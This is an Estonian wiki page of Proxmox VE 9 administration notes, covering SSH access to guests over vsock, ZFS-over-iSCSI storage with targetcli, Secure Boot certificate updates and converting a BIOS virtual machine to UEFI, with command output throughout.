# Disable all kinds of host identity checks, since these addresses are generally ephemeral.
StrictHostKeyChecking no
UserKnownHostsFile /dev/null
</pre>

kus

* tuleb kasutada 'man systemd-ssh-proxy' utiliiti

Kasutamine paistab välja selline

<pre>
root@pve-wrx90e:~# ssh root@vsock/50056
Warning: Permanently added 'vsock/50056' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 31 23:53:37 2026 from 192.168.10.156
root@unifi-oss:~#

root@unifi-oss:~# w
23:59:55 up 6 min, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 - 23:59 1.00s 0.00s ? w
</pre>

kus

* vsock kaudu lähenemise puhul on iseloomulik 'FROM -' (tavaliselt on seal src ip aadress)

Peale kasutaja sisselogimist paistab

<pre>
root@unifi-oss:~# ss -a -p --vsock
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
v_str LISTEN 0 0 *:22 *:* users:(("systemd",pid=1,fd=66))
v_str ESTAB 0 0 50056:22 2:3327097366 users:(("sshd-session",pid=914,fd=7),("sshd-session",pid=914,fd=6),("sshd-session",pid=905,fd=7),("sshd-session",pid=905,fd=6),("systemd",pid=1,fd=8))
</pre>

kus

* af_vsock osakonnas on sarnasel af_inet osakonnale ka listen socket ning 'active connected socket'

Tundub, et uuemal ajal on ssh agar kuulama ka af_unix soketil

<pre>
root@unifi-oss:~# screendump | grep -i ssh
[ OK ] Listening on sshd-unix-local.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local).
[ OK ] Listening on sshd-vsock.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK).
[ OK ] Reached target ssh-access.target - SSH Access Available.
Starting ssh.service - OpenBSD Secure Shell server...
[ OK ] Started ssh.service - OpenBSD Secure Shell server.
</pre>

ja tõesti, lokaalselt saab arvutisse logida sisse nii

<pre>
root@unifi-oss:~# ssh unix/run/ssh-unix-local/socket
Warning: Permanently added 'unix/run/ssh-unix-local/socket' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun 1 00:16:42 2026 from UNKNOWN

root@unifi-oss:~# w
00:16:44 up 23 min, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/2 - 00:16 1.00s 0.00s ? w
root pts/1 - 00:16 2.00s 0.00s ? ssh unix/run/ssh-unix-local/socket
</pre>

Kasulikud lisamaterjalid

* https://www.auul.pri.ee/wiki/Linux_operatsioonis%C3%BCsteemis_t%C3%B6%C3%B6tab_v%C3%B5rgu%C3%BChendus#systemd_kasutamine_network-proxy_rollis

===Üle vsock ssh kasutamine - Ubuntu 24.04===

Ettevalmistavalt tuleb 22/tcp käivitada ainult konkreetselt ip aadressil

<pre>
root@zabbix-pub-01:~# grep ^Liste /etc/ssh/sshd_config
ListenAddress 192.168.10.194
</pre>

ja laadida kerneli moodul

<pre>
root@zabbix-pub-01:~# modprobe vmw_vsock_virtio_transport
</pre>

Ubuntu 24.04 keskkonnas on tehniliselt kõik vajalik vsock kasutamiseks olemas, tuleb lisada kaks system elementi

* sshd-vsock.socket - õpetab systemd pid=1 protsessile kuulama võrgus 22/vsock pordil
* sshd-vsock@.service - õpetab 22/vsock pordile sissetuleva pöördumist üleandmist sshd protsessile

<pre>
root@zabbix-pub-01:~# ls -ld /etc/systemd/system/sshd-vsock*
-rw-r--r-- 1 root root 380 Jun 20 15:38 /etc/systemd/system/sshd-vsock@.service
-rw-r--r-- 1 root root 265 Jun 20 13:33 /etc/systemd/system/sshd-vsock.socket
</pre>

ning

<pre>
root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock.socket
[Unit]
Description=OpenSSH Server Socket (AF_VSOCK Network-Independent Line)
Documentation=man:sshd(8) man:sshd_config(5)
# Notice: No "Conflicts=" or "Before=" entries are needed here!

[Socket]
ListenStream=vsock::22
Accept=yes

[Install]
WantedBy=sockets.target

root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock@.service
[Unit]
Description=OpenSSH Server Socket Per-Connection Daemon (VSOCK Backup)
Documentation=man:sshd(8) man:sshd_config(5)
After=auditd.service

[Service]
EnvironmentFile=-/etc/default/ssh
# The -i flag forces sshd to run in "inetd" mode to accept the raw systemd socket
ExecStart=-/usr/sbin/sshd -i $SSHD_OPTS
StandardInput=socket
RuntimeDirectory=sshd
RuntimeDirectoryMode=0755
</pre>

Käivitamiseks sobib öelda

<pre>
root@zabbix-pub-01:~# systemctl daemon-reload
root@zabbix-pub-01:~# systemctl enable --now sshd-vsock.socket
</pre>

Tulemusena kuulatakse 22/vsock peal

<pre>
root@zabbix-pub-01:~# systemctl list-sockets | grep ssh
192.168.10.194:22 ssh.socket ssh.service
vsock::22 sshd-vsock.socket -
</pre>

===Proxmox VE Firewall===

====Misc====

Probleeme tekitada võiv kombinatsioon, vältida

* Hardware -> network device -> Firewall - Enable
* Firewall -> Option - No

====Kasulikud lisamaterjalid====

* https://pve.proxmox.com/pve-docs-7/chapter-pve-firewall.html

===Misc===

Tundub, et pve 9 ja qemu 11 kandis on hakanud ilmuma 'x86_64 v2 aes' virtuaalse protsessori kasutamisel sellised teated, nt 'host' protsessoriga neid ei ole

<pre>
root@pve-wrx90e:~# pveversion
pve-manager/9.2.3/d0fde103346cf89a (running kernel: 7.0.6-2-pve)

root@pve-wrx90e:~# dmesg | grep WRMSR | tail -n 4
[30021.694536] kvm: kvm [323176]: vcpu0, guest rIP: 0xffffffffb807e744 Unhandled WRMSR(0xc0010007) = 0xffff
[30090.614209] kvm: kvm [324048]: vcpu0, guest rIP: 0xffffffff84e6d9b4 Unhandled WRMSR(0xc0010007) = 0xffff
[30308.798770] kvm: kvm [326811]: vcpu0, guest rIP: 0xffffffff8d67e744 Unhandled WRMSR(0xc0010007) = 0xffff
[180421.745980] kvm: kvm [3632532]: vcpu0, guest rIP: 0xffffffff81242297 Unhandled WRMSR(0xc0010007) = 0xffff
</pre>

===arm64 platvormi emuleerimine===

Tundub, et PVE v. 9.2 juures ilmub webgui peale vcpu valik 'arm (64-bit)'

[[Fail:20260614-pve-01.png|600px]]

kus

* TODO

<pre>
root@pve-svc-02:~# apt-get install pve-edk2-firmware-aarch6
</pre>

===Kasulikud lisamaterjalid===

* TODO

Proxmox v. 9 kasutamine

2026-06-20T14:21:13Z

Imre: /* Üle vsock ssh kasutamine */

===Sissejuhatus===

TODO

===Virtuaalne riistvara===

Klaviatuur ja hiir

<pre>
root@pwrk-02:~# systool -b serio
Bus = "serio"

Device = "serio0"
Device = "serio1"

root@pwrk-02:~# systool -b serio -v
Bus = "serio"

Device = "serio0"
Device path = "/sys/devices/platform/i8042/serio0"
bind_mode = "auto"
description = "i8042 KBD port"
drvctl = <store method only>
err_count = "0"
extra = "0"
firmware_id = "PNP: PNP0303"
force_release = "369-370"
modalias = "serio:ty06pr00id00ex00"
scroll = "0"
set = "2"
softraw = "1"
softrepeat = "0"
uevent = "DRIVER=atkbd
SERIO_TYPE=06
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty06pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0303"

Device = "serio1"
Device path = "/sys/devices/platform/i8042/serio1"
bind_mode = "auto"
description = "i8042 AUX port"
drvctl = <store method only>
firmware_id = "PNP: PNP0f13"
modalias = "serio:ty01pr00id00ex00"
protocol = "VirtualPS/2"
rate = "100"
resetafter = "5"
resolution = "200"
resync_time = "0"
uevent = "DRIVER=psmouse
SERIO_TYPE=01
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty01pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0f13"
</pre>

===remote zfs over iscsi===

====Mõisted====

* FUA (Forced Unit Access) -
* WCE (Write Cache Enable) -
* TPU (Thin Provisioning UNMAP) -
* TPWS (WRITE_SAME / Zeroing) -
* VFS (virtual file system) -

====Tööpõhimõte====

Virtuaalse arvuti vaatest andmetega tegelemine

pve virtuaalne arvuti -> pve füüsiline arvuti -> over-iscsi-zfs-storage-server

Sõltuvalt qemu virtuaalse arvuti virtuaalse plokkseadme 'Cache' seadistustest on võimalik erinevate cache komplektide-kombinatsioonide kasutamine andmete liikumisel virtuaalses arvutis töötava protsessi juurest zfs storage serveri füüsilisele plokkseadmele. Tundub, et 2025 aastal on kõige keskmisemale kasutusele sobiv valik 'Cache: nocache'

* hea jõudlus
* hea terviklus

Andmete liikumise teekond

* virtuaalse arvuti rakendus
* virtuaalse arvuti vfs failisüsteem
* virtuaalse arvuti page cache (vfs'ga seotud)
* virtuaalse arvuti ext4 failisüsteem (ext4 draiver)
* virtuaalse arvuti lvm
* virtuaalse arvuti fdisk partitsioonid
* virtuaalse arvuti virtuaalne sata vms kontroller
* füüsilise arvuti qemu protsess
* füüsilise arvuti open-iscsi poolt teostatud /dev/sda scsi plokkseade (puudub cache)
* füüsilises arvutis storage'ga seotud cache puudub
* storage arvuti targetcli (puutub cache)
* storage arvuti zfs ressurss (sisaldab zfs cache)
* storage avuti füüsilise plokkseadme controller-cache

'Cache: nocache' parameeter on üks vähestest parameetritest, mis avaldab mõju nö mõlemas suunas

* virtuaalse arvuti seest kasutada olevale storage ressursile
* kuidas füüsilise arvuti sees virtuaalsele arvutile vastav qemu protsess kasutab allolevat plokkseadet

Käesolevas tekstis kirjeldatakse nelja komponendi seadistamist

* virtuaalsele arvutile vastav qemu protsess
* iscsi initiator
* iscsi target
* zfs lahendus

====zfs lahendus iscsi target arvutis====

Füüsilised kettad on kasutusel nö kõige tavalisemal viisil, eriti tähendab see, et ketastel on sisselülitatud nö tavaline controller-cache

<pre>
root@pve-svc-02:~# lsscsi -s | grep 4.00T
[2:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdc 4.00TB
[3:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdd 4.00TB
[N:0:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme0n1 4.00TB
[N:1:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme1n1 4.00TB
</pre>

zfs lülituse moodustamine

<pre>
root@pve-svc-02:~# cat create-zpool-raidz1-x4.sh
zpool create -o ashift=13 zp_data raidz1 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FE58 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FF7B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501827B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501856Z
</pre>

zfs cache töötab tavalisel viisil, st on sisse lülitatud olekus, nt

<pre>
root@pve-svc-02:~# zfs get all | grep -i cache | grep vm-106-disk-0
zp_crucial_mx_4/vm-106-disk-0 primarycache all default
zp_crucial_mx_4/vm-106-disk-0 secondarycache all default
</pre>

====targetcli iscsi target arvutis====

targetcli seadistamine koosneb kahest tegevusest

* zfs põhise alus-storage storage publitseerimine
* publitseerimisel sobivalt scsi protokolli parameetrite kasutamine (eriti cache, sparse jms esitamine)

<pre>
/> /iscsi create iqn.2025-10.moraal.srv:storage.zfstarget
/> /iscsi/iqn.2025-10.moraal.srv:storage.zfstarget/tpg1/acls create iqn.1993-08.org.debian:01:4cbe32bd26b
</pre>

Sobiv seadistus, mis tuleb plokk-ressursi jaoks kehtestada

<pre>
root@pve-svc-02:~# targetcli /backstores/block/zp_crucial_mx_4-vm-108613-disk-4 get attribute | grep =
======================
alua_support=1
block_size=512
emulate_3pc=1
emulate_caw=1
emulate_dpo=1
emulate_fua_read=1
emulate_fua_write=1
emulate_model_alias=1
emulate_pr=1
emulate_rest_reord=0
emulate_rsoc=1
emulate_tas=1
emulate_tpu=0
emulate_tpws=0
emulate_ua_intlck_ctrl=0
emulate_write_cache=0
enforce_pr_isids=1
force_pr_aptpl=0
hw_block_size=512 [ro]
hw_max_sectors=32768 [ro]
hw_pi_prot_type=0 [ro]
hw_queue_depth=128 [ro]
is_nonrot=1
max_unmap_block_desc_count=1
max_unmap_lba_count=131072
max_write_same_len=65535
optimal_sectors=32768
pgr_support=1
pi_prot_format=0
pi_prot_type=0
pi_prot_verify=0
queue_depth=128
submit_type=0
unmap_granularity=8
unmap_granularity_alignment=0
unmap_zeroes_data=0
</pre>

kus

* TODO

Muudatuse tegemine

<pre>
/backstores/b...108613-disk-4> set attribute emulate_tpws=0
/backstores/b...108613-disk-4> set attribute emulate_tpu=0
</pre>

Kasutamine paistab välja selline

<pre>
root@pve-svc-02:~# targetcli
targetcli shell version 2.1.53
Copyright 2011-2013 by Datera, Inc and others.
For help on commands, type 'help'.

/> ls
o- / ......................................................................................................................... [...]
o- backstores .............................................................................................................. [...]
| o- block .................................................................................................. [Storage Objects: 3]
| | o- zp_crucial_mx_4-vm-100-disk-0 ......................... [/dev/zp_crucial_mx_4/vm-100-disk-0 (20.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-106-disk-5 ......................... [/dev/zp_crucial_mx_4/vm-106-disk-5 (16.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-108613-disk-1 .................... [/dev/zp_crucial_mx_4/vm-108613-disk-1 (4.0GiB) write-thru activated]
| | o- alua ................................................................................................... [ALUA Groups: 1]
| | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| o- fileio ................................................................................................. [Storage Objects: 0]
| o- pscsi .................................................................................................. [Storage Objects: 0]
| o- ramdisk ................................................................................................ [Storage Objects: 0]
o- iscsi ............................................................................................................ [Targets: 1]
| o- iqn.2025-10.moraal.srv:storage.zfstarget .......................................................................... [TPGs: 1]
| o- tpg1 ............................................................................................... [no-gen-acls, no-auth]
| o- acls .......................................................................................................... [ACLs: 1]
| | o- iqn.1993-08.org.debian:01:4cbe32bd26b ................................................................ [Mapped LUNs: 3]
| | o- mapped_lun0 ...................................................... [lun0 block/zp_crucial_mx_4-vm-108613-disk-1 (rw)]
| | o- mapped_lun1 ......................................................... [lun1 block/zp_crucial_mx_4-vm-106-disk-5 (rw)]
| | o- mapped_lun2 ......................................................... [lun2 block/zp_crucial_mx_4-vm-100-disk-0 (rw)]
| o- luns .......................................................................................................... [LUNs: 3]
| | o- lun0 .............. [block/zp_crucial_mx_4-vm-108613-disk-1 (/dev/zp_crucial_mx_4/vm-108613-disk-1) (default_tg_pt_gp)]
| | o- lun1 .................... [block/zp_crucial_mx_4-vm-106-disk-5 (/dev/zp_crucial_mx_4/vm-106-disk-5) (default_tg_pt_gp)]
| | o- lun2 .................... [block/zp_crucial_mx_4-vm-100-disk-0 (/dev/zp_crucial_mx_4/vm-100-disk-0) (default_tg_pt_gp)]
| o- portals .................................................................................................... [Portals: 1]
| o- 0.0.0.0:3260 ..................................................................................................... [OK]
o- loopback ......................................................................................................... [Targets: 0]
o- srpt ............................................................................................................. [Targets: 0]
o- vhost ............................................................................................................ [Targets: 0]
o- xen-pvscsi ....................................................................................................... [Targets: 0]
/>
</pre>

Lisaks saab portaali käest küsida attribute ja parameter komplekte, nt

<pre>
root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get parameter | grep =
======================
AuthMethod=CHAP
DataDigest=CRC32C,None
DataPDUInOrder=Yes
DataSequenceInOrder=Yes
DefaultTime2Retain=20
DefaultTime2Wait=2
ErrorRecoveryLevel=0
FirstBurstLength=65536
HeaderDigest=CRC32C,None
IFMarkInt=Reject
IFMarker=No
ImmediateData=Yes
InitialR2T=Yes
MaxBurstLength=262144
MaxConnections=1
MaxOutstandingR2T=1
MaxRecvDataSegmentLength=8192
MaxXmitDataSegmentLength=262144
OFMarkInt=Reject
OFMarker=No
TargetAlias=LIO Target

root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get attribute | grep =
======================
authentication=1
cache_dynamic_acls=0
default_cmdsn_depth=64
default_erl=0
demo_mode_discovery=1
demo_mode_write_protect=1
fabric_prot_type=0
generate_node_acls=0
login_keys_workaround=1
login_timeout=15
prod_mode_write_protect=0
t10_pi=0
tpg_enabled_sendtargets=1
root@pm60-trt:~#
</pre>

kus

* parameter - võrgus kõneldavad asjad
* attribute - lokaalselt olukorda määratlevad asjad

====iscsi initiator====

TODO

====qemu protsess====

Kasutamine

[[Fail:20251019-remote-zfs-over-iscsi-01.png|600px]]

====Kasulikud lisamaterjalid====

TODO

===Secure boot - nn Microsoft 2023 sertifikaat===

====Tööpõhimõte====

TODO

====Olemasolev olukord enne muudatust====

<pre>
root@pwrk-01:~# apt-get install efitools
root@pwrk-01:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====Muudatus====

<pre>
root@pve-wrx90e:~# qm enroll-efi-keys 902198
skipping - OS type is neither Windows 10 nor Windows 11

root@pve-wrx90e:~# qm set 902198 --ostype win10
root@pve-wrx90e:~# qm enroll-efi-keys 902198
root@pve-wrx90e:~# qm set 902198 --ostype l26
</pre>

ja

<pre>
from

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,pre-enrolled-keys=1,size=1M

to

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,ms-cert=2023w,pre-enrolled-keys=1,size=1M
</pre>

====Uus olukord peale muudatust====

<pre>
root@pwrk-02:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, O=Microsoft Corporation, CN=Microsoft UEFI CA 2023
C=US, O=Microsoft Corporation, CN=Windows UEFI CA 2023
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====WebGUI abil====

WebGUI abil vm sertifikaat muudatus

Disk Action -> Enroll Updated Certificates

[[Fail:20260611-pve-ms-cert-2023-01.png|700px]]

kus

* TODO

===Misc===

====pveupdate====

* uuendab webgui liidese sertifikaadi

<pre>
root@pve-wrx90e:~# pveupdate
Loading ACME account details
Placing ACME order
Order URL: https://acme-v02.api.letsencrypt.org/acme/order/2232348225/504476182801

Getting authorization details from 'https://acme-v02.api.letsencrypt.org/acme/authz/2232348225/694056506271'
The validation for pve-wrx90e.auul.pri.ee is pending!
Setting up webserver
Triggering validation
Sleeping for 5 seconds
Status is 'valid', domain 'pve-wrx90e.auul.pri.ee' OK!

All domains validated!

Creating CSR
Checking order status
Order is ready, finalizing order
valid!

Downloading certificate
Setting pveproxy certificate and key
Restarting pveproxy
Revoking old certificate
Revoke request to CA failed: Error: POST to https://acme-v02.api.letsencrypt.org/acme/revoke-cert
{
"type": "urn:ietf:params:acme:error:unauthorized",
"detail": "Unable to revoke :: Certificate is expired",
"status": 403
}
</pre>

====pveupgrade====

* uuendab süsteemi apt paketihaldusega tarkvara

===BIOS arvuti teisendamine UEFI arvutiks===

====Tööpõhimõte====

Peamised kaalutlused BIOS arvuti teisendamisel UEFI arvutiks

* vajadus saada osa secure boot lahendusega kaasnevast turvalisusest
* nö täieline reinstall oleks liiga aeganõudev, kohmakas jne

Muudatus seisneb virtuaalsele arvutile täiendava nö esimese plokkseadme lisamisel, suurusega 1 G. Sinna moodustatakse gpt partitsioonitabel ning vfat failisüsteem, ja ta vastab nö kataloogile /boot/efi, sinna ta ka monteeritakse kokkuvõttes. Juurfailisüsteem ja muu jääb sinna kus ta seni on olnud. Oluline on, et muudatuse käigus ei muudeta olemasoleva plokkseadme partitsioonitabelit ega lvm vms, st ebaõnnestumisel saab pöörduda tagasi kergesti (varundus peaks aga siiski olema olemas).

====Muudatuse protseduur====

Enne muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-01.png|700px]]

ning

<pre>
# df -T -h -t ext4
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
</pre>

Lisatakse töötavale arvutile 1 g plokkseade

Hardware -> Add disk -> ...

Veendutakse, mis on konkreetsel juhtumil 1 g lisatud plokkseadme nimi, nt

<pre>
# fdisk /dev/vdb -l
Disk /dev/vdb: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
</pre>

edasi käsundamine

<pre>
# apt-get install parted

# parted /dev/vdb mklabel gpt
# parted /dev/vdb mkpart primary fat32 1MiB 100%
# parted /dev/vdb set 1 esp on
# mkfs.vfat -F 32 /dev/vdb1
# mkdir -p /boot/efi
# blkid /dev/vdb1
</pre>

Muuta /etc/fstab faili, st lisada üks rida olemaoleva /boot rea alla, uuid on mitte partitsiooni, aga vfat failisüsteemi

<pre>
# cat /etc/fstab
..
UUID=XXXX-XXXX /boot/efi vfat defaults 0 2
</pre>

Lisada paketid

<pre>
# systemctl daemon-reload
# mount /boot/efi
# apt update
# apt install grub-efi-amd64-signed shim-signed mokutil
# grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=debian --removable
# update-grub
</pre>

tulemusena

<pre>
# find /boot/efi/ -type f -ls
115 932 -rwxr-xr-x 1 root root 952384 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.EFI
116 2624 -rwxr-xr-x 1 root root 2685544 mai 17 12:00 /boot/efi/EFI/BOOT/grubx64.efi
117 832 -rwxr-xr-x 1 root root 851368 mai 17 12:00 /boot/efi/EFI/BOOT/mmx64.efi
118 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.CSV
119 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/grub.cfg

# cat /boot/efi/EFI/BOOT/grub.cfg
search.fs_uuid 5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1 root
set prefix=($root)'/grub'
configfile $prefix/grub.cfg

# blkid /dev/vda1
/dev/vda1: UUID="5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1" BLOCK_SIZE="1024" TYPE="ext4" PARTUUID="cfa36d3a-01"
</pre>

Õeldakse virtuaalsele arvutile poweroff ja muudetakse seadistusi

* lisatakse 'EFI Disk' (virtuaalne efi riistvara seadistuste salvestamine jms)
* muudetakse bios -> uefi
* muudetakse chipset i440fx -> q35
* muudetakse display default -> virtio-gpu

Peale muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-02.png|700px]]

Lisaks on boot järjekorra seadmed muudetud

[[Fail:20260516-from-bios-to-uefi-03.png|700px]]

kus

* tingimata vajalik on virtio1 ja virtio0 - esimesel on bootload ja grub.cfg lühike konf, teisel on konfi sisuline osa

Tulemusena töötab arvuti uefi secure boot režiimis

<pre>
# mokutil --sb-state
SecureBoot enabled

# df -t vfat -t ext4 -T -h
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
/dev/vdb1 vfat 1020M 8,7M 1012M 1% /boot/efi
</pre>

Kõige lõpus võiks veel öelda, nii tekivad nö naturaalsed efibootmgr ja /boot/efi sissekanded nagu nad oleks seal nö sündinud-uefi'na arvutil

<pre>
# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}

# grub-install /dev/vdb
Installing for x86_64-efi platform.
Installation finished. No error reported.

# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0004,0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}
Boot0004* debian HD(1,GPT,0fb8cfd1-c90b-4da2-97db-ceda14464a90,0x800,0x1ff000)/File(\EFI\proxmox\shimx64.efi)
</pre>

====Boot Order märkused====

PVE webgui Boot Order määrab kaks

* millised plokkseadmed osalevad uefi faasis
* millised järjekorras plokkseadmed osalevad uefi faasis alglaadimisel

Kui on linnutatud ainult üks seade

[[Fail:20260516-from-bios-to-uefi-05.png|800px]]

Kui on linnutatud ainult kaks seadet

[[Fail:20260516-from-bios-to-uefi-04.png|800px]]

Antud juhul on see väga oluline kuna grub alglaadur on kahel seadmel laiali

* grub.efi rakendus asub /dev/vdb
* grub.conf seadistus asub /dev/vda

Kui Boot Order on linnutatud vaid /dev/vda, siis peatub arvuti käivitumine 'grub>' prompt juures. Selles mõttes võiks olla PVE webgui osakonna nimeks nt 'UEFI device visibility and Boot Order'.

===Üle vsock ssh kasutamine - Ubuntu 26.04 ja Debian v. 13===

Osutub, et uuemal ajal, st PVE v. 9, Debian v. 13 virtuaalne avuti on võimalik PVE host pealt pöörduda guest poole üle ssh kasutades vsock protokolli (mitte tavalist tcp/ip protokollil põhinevat võrku). Selleks tuleb virtuaalsele arvutile lisada PVE platvormi poolt vsock tugi

<pre>
root@pve-wrx90e:~# head -n 1 /etc/pve/qemu-server/50056.conf
args: -device vhost-vsock-pci,guest-cid=50056
</pre>

ja virtuaalsel arvutil peab olema tarkvaraline vsock tugi. Nt Debian v. 13 puhul on sshd serverisse see integreeritud

<pre>
root@unifi-oss:~# systemctl | grep ssh
ssh.service loaded active running OpenBSD Secure Shell server
sshd@2-50056:22-2:3327097365.service loaded active running OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097364)
system-sshd.slice loaded active active Slice /system/sshd
sshd-unix-local.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local)
sshd-vsock.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK)
ssh-access.target loaded active active SSH Access Available
</pre>

kus

* systemd-ssh-generator on selline süsteem, mis käigult avastab süsteemi võimekusi ja vastavalt seadistab teenustele omadusi (nt ssh puhul lülitatakse sisse vsock tugi)

ning

<pre>
root@unifi-oss:~# systemctl status sshd@2-50056:22-2:3327097365.service
● sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365)
Loaded: loaded (/usr/lib/systemd/system/sshd@.service; static)
Active: active (running) since Mon 2026-06-01 00:04:39 EEST; 16s ago
Invocation: 84acdad56690460e8e0fbffd2ecd4d69
TriggeredBy: ● sshd-vsock.socket
Docs: man:sshd(8)
man:sshd_config(5)
Main PID: 876 (sshd-session)
Tasks: 1 (limit: 6978)
Memory: 1.8M (peak: 3.9M)
CPU: 27ms
CGroup: /system.slice/system-sshd.slice/sshd@2-50056:22-2:3327097365.service
‣ 876 "sshd-session: root [priv]"

Jun 01 00:04:39 unifi-oss systemd[1]: Started sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365).
Jun 01 00:04:40 unifi-oss sshd-session[876]: Accepted publickey for root from UNKNOWN port 65535 ssh2: ED25519 SHA256:3cj7QCk4leNOSQJlfeUeHr6YfsA0r3bRUqZS9Rey3jM
Jun 01 00:04:40 unifi-oss sshd-session[876]: pam_unix(sshd:session): session opened for user root(uid=0) by root(uid=0)
</pre>

kus

* triggered by 'sshd-vsock.socket'

